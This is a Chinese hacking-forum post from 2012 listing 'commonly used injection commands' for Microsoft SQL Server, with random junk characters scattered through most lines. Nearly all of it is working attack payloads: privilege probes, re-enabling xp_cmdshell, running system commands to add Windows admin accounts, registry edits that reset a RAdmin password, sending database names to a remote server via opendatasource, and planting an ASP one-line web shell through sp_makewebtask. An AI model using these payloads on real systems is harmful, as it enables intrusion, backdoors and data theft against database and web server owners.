找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2061|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的' b! e  d; S# D
and 1=(Select IS_MEMBER('db_owner'))9 W$ b" `8 W4 Q3 r
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--; o/ l8 g* q' i. B; Q; ^& t" e

  A* H4 O5 Y6 Q. v8 L1 z+ g//检测是否有读取某数据库的权限2 E( P7 q5 A# q: @8 u0 P
and 1= (Select HAS_DBACCESS('master'))
. P4 S6 m& j) B- Y. w2 eAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --9 X7 e+ r( p# _5 L: v
# A/ c* l. P$ M5 q! C+ `8 t6 }; q
6 y, E) D0 `! j& A, T5 [8 }- {
数字类型
8 P& _6 V& @5 r, r* z; ^and char(124)%2Buser%2Bchar(124)=0
' N1 a% U% @3 ^, Q+ g
+ D( y; C. U0 A. F- f字符类型
! h* `4 a, z  P- I8 [/ u' and char(124)%2Buser%2Bchar(124)=0 and ''='
9 ], F7 ~4 [* a% J; \2 J8 p6 D9 w5 k/ m
搜索类型
9 D7 t+ P7 O5 V4 `! Z' and char(124)%2Buser%2Bchar(124)=0 and '%'='% D; Z" u( {/ P1 O' ^5 s2 _

' b+ u: H$ X: p1 c& Y8 {爆用户名6 z( a: E' q8 l
and user>01 V- k7 D/ _( t$ c4 u& U) Z( Q) J( H
' and user>0 and ''='! X3 g+ _9 u; ^+ Z2 K

. s% [3 s) X# n+ X1 H6 O检测是否为SA权限) ^- u- _4 k6 i" \" m7 n4 G
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
; q, v1 f& l+ _, C& J& ], k1 ?And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
9 B, k7 V* r; o1 i2 d5 s0 R
/ ?4 Z, A( r4 E+ y" B检测是不是MSSQL数据库
$ v  y8 k1 a) p3 @" N& vand exists (select * from sysobjects);--
' h6 D% b3 @) ?7 h( W
5 O7 Y8 Z( c7 S! e% |4 a检测是否支持多行  X  D) O5 a- j" l8 o+ j3 i- R" v
;declare @d int;--9 Z: f8 r0 F4 t9 U: q
4 N  e$ q* ?3 ]; k! n# J
恢复 xp_cmdshell% S4 [0 d/ h6 @/ l( i
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--2 Z$ O: Z8 f( D6 G+ r# y$ E0 ]
& w' y. I9 t! p) |

& x, q0 s9 `, ]; ^/ hselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
' ~- ~4 \( O( H! u. f! s5 Y
0 o& ^3 R7 u: r# C. C# {//-----------------------
$ K0 }9 ?  _+ ^) N( Z2 p5 ?, a" i//       执行命令
, A" A5 k- a8 r//-----------------------) l1 o& C- v6 v0 D3 `8 Z
首先开启沙盘模式:
' Z6 P" i' J3 K) i  dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 c) w: E* C$ Q9 l
8 r% r5 J: _) T$ ]. I* f然后利用jet.oledb执行系统命令
/ C9 M6 g. w/ k! Bselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')& l7 l9 d% S2 C0 x4 j/ H, c- G
0 B% `- z5 q' \: U1 p# [# {% C
执行命令! R  H6 P, @1 x+ u! [% r( ]+ b; R
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
8 l) E3 J, ]$ d: j
8 T( k8 t: {! iEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
$ w9 s7 y, O2 h. T0 X9 A
& j+ ?2 Z7 @5 M: N$ q1 T# ~2 U判断xp_cmdshell扩展存储过程是否存在:# m! e8 c% E3 n! D+ ~; t1 ^; b
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')/ l0 M8 X( W3 T! c, _1 t" |$ J
+ s. s/ d! y7 I/ H4 S1 J! h: P4 f
写注册表
( t  E( t% U% r/ ~9 Rexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# z$ f. Y; C; o" R- Y4 J: `% W9 M+ {/ L* A/ l% f
REG_SZ
* B! H, k% k$ t9 y. h
: g; p5 t# V( {; w读注册表
6 G& U; _' B7 O; F( L! Hexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'. G! D5 [3 y" {: p- X' z

3 R  Y- A  C$ }* f+ q! S读取目录内容
5 Y* K/ p& j8 `0 o# b/ k& `% Hexec master..xp_dirtree 'c:\winnt\system32\',1,1
- b/ P! L% E3 s1 b
) l7 s/ c; J* B4 |6 x. H; C- C: ^
( C0 Z; c3 J$ Q; M. [数据库备份4 Y) n5 L& ?5 i! S4 I7 L3 i2 S7 r+ Q
backup database pubs to disk = 'c:\123.bak'8 v: g0 J# _" w7 C2 t5 |

8 D) d0 P, ]3 A//爆出长度
1 S6 n4 X3 N( \7 F$ x9 O# wAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
1 `( s- r) N5 v. g( q& }+ ^8 h$ }  @  }

6 F1 z1 g1 P" l0 h) p
$ f) [8 U) Q7 R8 y# b1 {3 W( u更改sa口令方法:用sql综合利用工具连接后,执行命令:
+ Q9 t: S$ u" y% Iexec sp_password NULL,'新密码','sa'
5 q) `4 y  _% z* c) ]4 e2 V: c6 u* X. B& z+ S8 c! J. @
添加和删除一个SA权限的用户test:# B( h9 ?  \( M6 ^
exec master.dbo.sp_addlogin test,9530772
, o: s4 h4 }2 P8 k& \: l) _exec master.dbo.sp_addsrvrolemember test,sysadmin  `8 }# L, B0 [8 s; a
' {' h9 i$ v; T4 _: ~
删除扩展存储过过程xp_cmdshell的语句:
% o. c/ h: e% I9 yexec sp_dropextendedproc 'xp_cmdshell'
1 j& E5 C# c; A* m' M
1 v( _4 R3 B" D. v6 n添加扩展存储过过程! {8 ^6 ?4 A5 \: f! J9 a  X3 V
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
3 @( z$ U+ O1 ^1 F2 o) y, [" m1 n# ^GRANT exec On xp_proxiedadata TO public
& Z$ o1 k1 i: O; d) f* |1 g- h/ c
5 x9 G- ^- J' K2 d1 ~7 e$ C1 p& Z' E& p7 J6 d9 m, n- z4 E
停掉或激活某个服务。
/ i1 R4 p& x3 }
' ]+ F4 o  S7 Wexec master..xp_servicecontrol 'stop','schedule'
- A( q# i, Y! D4 i9 T" X6 t% \exec master..xp_servicecontrol 'start','schedule'' p7 O* n7 j# f% v

+ k% _( M* u. x5 f6 C  ldbo.xp_subdirs( T4 r' J, M- I3 }- j
8 ?4 X+ Z. s  s
只列某个目录下的子目录。, n- y- e- p- N3 a
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
9 o/ p$ l/ A* p, ~6 U$ B  S" K% I
( _% B8 x: m) ]9 V- N! X" Hdbo.xp_makecab
# _! V# `* c( I4 b8 s) _
) Y2 ?% F2 F# b8 d2 r9 M将目标多个档案压缩到某个目标档案之内。3 U# K1 N8 w0 |; B6 i7 x
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。. n  F, f/ y2 X6 v7 `
1 n" @3 n! {# \- R
dbo.xp_makecab
2 h' R; D: y/ w'c:\test.cab','mszip',1,
- J2 h+ p' J1 ?3 D1 ?. B'C:\Inetpub\wwwroot\SQLInject\login.asp',2 G$ T* w4 t. H+ _$ s6 U+ e# b
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'- ^" G) k6 L+ W' h: G9 J
7 E+ W" A& ^! D8 p: A/ q
xp_terminate_process5 N" z3 R1 B: q. [' s( _

( x( |6 j* Y9 A7 Q: D7 T停掉某个执行中的程序,但赋予的参数是 Process ID。& A( J/ M7 i8 Q/ {5 S0 f
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID" I  D( q0 a# O* B" s7 {

) G8 `% k; s, c( y* qxp_terminate_process 2484
5 P4 h$ G, h1 j' u* F. C
) `! |2 [( p& Q. `: Nxp_unpackcab
( ^+ v. g: \" t  Y( D3 K% o& W( C) E6 D. \1 ]; b# T0 D0 M
解开压缩档。# t3 m9 E: y, |( n' R

5 e- ?, A. W5 {, ~7 ]+ {+ t% T) _xp_unpackcab 'c:\test.cab','c:\temp',1% \" w- Q* i: S) p2 k

+ ?5 z) ^# {% P0 J* F8 H6 R1 {+ I
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* L% I1 V% Y1 ]! w1 h9 I! F( l3 a2 f, l/ A# T' \; V
create database lcx;/ {. K3 F, D# l
Create TABLE ku(name nvarchar(256) null);
- D4 p0 o3 F- I& M8 ^! G& J" kCreate TABLE biao(id int NULL,name nvarchar(256) null);) L) P, Z$ n  F# J
6 j) r8 P0 Z4 R- i( ?
//得到数据库名. h& X: q/ `/ U- N" |
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
0 R0 Y! P' Q0 c1 h' {8 [+ w1 t8 M. _5 a

" P5 x1 O! T! m' o) J# C8 X//在Master中创建表,看看权限怎样9 N. Y5 b. @4 C2 K. N
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--3 ]* _6 ^% [4 H0 t  T: S
# P0 g3 m" a- X
用 sp_makewebtask直接在web目录里写入一句话马:/ V( Y. E- f1 [3 F% `7 M
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
) W- L. z- a# K6 ?# G! {: \! Q) _, ?, t+ l4 @+ [, E' R
//更新表内容3 s1 K; U, S2 a. A0 @2 I
Update films SET kind = 'Dramatic' Where id = 123
( m0 x: U# S- o  |- B+ i& W) [3 v2 f. s. F4 Z" d% o2 W+ }3 H5 Q
//删除内容; I8 n" p- X0 M$ V6 P: Y9 q
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表